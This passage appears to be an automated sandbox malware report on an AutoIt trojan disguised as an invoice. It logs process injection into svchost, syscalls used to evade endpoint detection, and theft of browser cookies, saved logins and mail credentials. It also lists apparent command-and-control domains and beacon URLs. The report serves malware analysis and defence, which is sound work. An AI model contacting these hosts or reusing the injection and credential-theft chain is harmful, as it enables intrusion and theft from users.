            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\TapiUnattend.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeThread register set: target process: 7920Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeThread APC queued: target process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 313A008Jump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00361201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00361201
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00342BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00342BA5
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036B226 SendInput,keybd_event,0_2_0036B226
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003822DA
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00360B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00360B62
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00361663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00361663
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: PROFOMA INVOICE SHEET.exe, bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00320698 cpuid 0_2_00320698
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00378195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00378195
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0035D27A GetUserNameW,0_2_0035D27A
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0033BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0033BB6F
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003042DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_81
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_XP
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_XPe
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_VISTA
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_7
            Source: PROFOMA INVOICE SHEET.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00381204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00381204
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00381806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00381806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511723 Sample: PROFOMA INVOICE SHEET.exe Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 28 www.whats-in-the-box.org 2->28 30 www.weatherbook.live 2->30 32 22 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 7 other signatures 2->48 10 PROFOMA INVOICE SHEET.exe 1 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 bJWYsPIiPtg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 TapiUnattend.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 bJWYsPIiPtg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 zhs.zohosites.com 136.143.186.12, 55830, 55831, 55832 ZOHO-ASUS United States 22->34 36 www.shanhaiguan.net 156.242.132.82, 55826, 55827, 55828 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 5 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PROFOMA INVOICE SHEET.exe50%ReversingLabsWin32.Trojan.Leonem
            PROFOMA INVOICE SHEET.exe26%VirustotalBrowse
            PROFOMA INVOICE SHEET.exe100%AviraDR/AutoIt.Gen8
            PROFOMA INVOICE SHEET.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            webredir.vip.gandi.net0%VirustotalBrowse
            crowsecurity.cloud0%VirustotalBrowse
            zhs.zohosites.com0%VirustotalBrowse
            weatherbook.live1%VirustotalBrowse
            newdaydawning.net0%VirustotalBrowse
            whats-in-the-box.org2%VirustotalBrowse
            cdl-lb-1356093980.us-east-1.elb.amazonaws.com0%VirustotalBrowse
            15.164.165.52.in-addr.arpa0%VirustotalBrowse
            www.newdaydawning.net0%VirustotalBrowse
            www.whats-in-the-box.org1%VirustotalBrowse
            www.lanxuanz.tech1%VirustotalBrowse
            www.weatherbook.live0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.zoho.com/sites/images/professionally-crafted-themes.png0%Avira URL Cloudsafe
            http://www.newdaydawning.net/72tr/0%Avira URL Cloudsafe
            http://www.crowsecurity.cloud/jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            http://www.crowsecurity.cloud/jvjp/0%Avira URL Cloudsafe
            http://www.inspireplay.live/p8sm/0%Avira URL Cloudsafe
            http://www.aaavvejibej.bond/lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/ivo1/0%Avira URL Cloudsafe
            http://www.wajf.net0%Avira URL Cloudsafe
            http://www.o731lh.vip/2mtz/0%Avira URL Cloudsafe
            http://www.inspireplay.live/p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj0%Avira URL Cloudsafe
            http://www.selftip.top/85su/0%Avira URL Cloudsafe
            http://www.weatherbook.live/4hiy/0%Avira URL Cloudsafe
            http://www.newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=0%Avira URL Cloudsafe
            http://www.wajf.net/zl4r/0%Avira URL Cloudsafe
            http://www.wajf.net/zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            http://www.o731lh.vip/2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0=0%Avira URL Cloudsafe
            http://www.selftip.top/85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            http://www.whats-in-the-box.org/30jd/0%Avira URL Cloudsafe
            http://www.weatherbook.live/4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb0%Avira URL Cloudsafe
            http://www.shanhaiguan.net/p2q3/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            217.70.184.50
            truefalseunknown
            crowsecurity.cloud
            3.33.130.190
            truefalseunknown
            inspireplay.live
            3.33.130.190
            truefalse
              unknown
              zhs.zohosites.com
              136.143.186.12
              truefalseunknown
              o731lh.vip
              3.33.130.190
              truefalse
                unknown
                www.aaavvejibej.bond
                104.21.31.249
                truefalse
                  unknown
                  weatherbook.live
                  3.33.130.190
                  truefalseunknown
                  newdaydawning.net
                  44.213.25.70
                  truefalseunknown
                  www.selftip.top
                  199.192.21.169
                  truefalse
                    unknown
                    whats-in-the-box.org
                    3.33.130.190
                    truefalseunknown
                    www.shanhaiguan.net
                    156.242.132.82
                    truefalse
                      unknown
                      cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                      54.81.206.248
                      truefalseunknown
                      www.inspireplay.live
                      unknown
                      unknowntrue
                        unknown
                        www.kfowks.site
                        unknown
                        unknowntrue
                          unknown
                          15.164.165.52.in-addr.arpa
                          unknown
                          unknowntrueunknown
                          www.o731lh.vip
                          unknown
                          unknowntrue
                            unknown
                            www.turbonotes.app
                            unknown
                            unknowntrue
                              unknown
